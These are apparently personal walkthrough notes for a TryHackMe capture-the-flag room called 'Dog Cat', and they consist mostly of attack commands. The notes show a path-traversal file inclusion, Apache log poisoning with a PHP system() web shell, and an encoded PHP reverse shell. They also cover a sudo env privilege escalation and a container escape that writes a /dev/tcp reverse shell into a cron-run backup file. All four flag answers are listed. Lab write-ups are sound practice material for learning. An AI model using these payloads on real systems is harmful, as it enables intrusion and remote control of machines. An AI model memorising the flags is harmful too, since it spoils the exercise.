Dog Cat 



https://www.revshells.com/

PHP exec

Encoding

php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.145212%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

nc -lvnp 4444


BURP   (Set this)
1. 

GET  /?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=

User-Agent: <?php system($_GET['cmd']);?>

2. 

GET  /?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.145212%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


you get shell 

/bin/sh -I

sudo -l 


gtfo bin  = env  = env /bin/sh

sudo /usr/bin//env /bin/sh


cd /opt

ls  = backup.tar

crontab -e
Not Showing CronJob But if you "ls" again you see backup file write time change it means it is  CronJob but it is on HOST Machine mounting thi & not on Contener you Host Machine access Now 


echo "sh -i >& /dev/tcp/192.168.145.212/4444 0>&1" >> backup.tar

nc -lvnp 4444

you get shell After 1min

try

cd /root/container      = work 
ls 
cd backup
ls      = See mounted backup cron


cd /root
ls cat root.txt

What is flag 1?
THM{Th1s_1s_N0t_4_Catdog_ab67edfa}

What is flag 2?
THM{LF1_t0_RC3_aec3fb}

What is flag 3?
THM{D1ff3r3nt_3nv1ronments_874112}

What is flag 4?
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Correct Answer
How likely are you to r


